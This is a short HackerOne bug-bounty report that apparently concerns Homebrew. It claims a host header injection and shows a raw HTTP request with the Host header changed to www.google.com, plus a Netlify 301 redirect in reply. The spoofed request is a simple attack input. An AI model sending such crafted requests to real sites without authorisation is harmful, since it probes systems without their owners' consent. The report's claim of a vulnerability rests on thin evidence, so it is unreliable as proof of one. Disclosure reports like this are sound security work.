Homebrew: Host header Injection

2017-04-18T14:34:10
ID H1:221908
Type hackerone
Reporter smit
Modified 2017-04-19T09:04:56

Description

HI SECURITY TEAM

Here is host header injection.

Request (changing host to www.google.com)

GET / HTTP/1.1 Host: www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive

RESPONSE(www.google.com injected)

HTTP/1.1 301 Moved Permanently Cache-Control: public, max-age=0, must-revalidate Content-Length: 35 Content-Type: text/plain Date: Tue, 18 Apr 2017 14:23:25 GMT Location: https://google.com/ Age: 0 Connection: keep-alive Server: Netlify

Redirecting to https://google.com/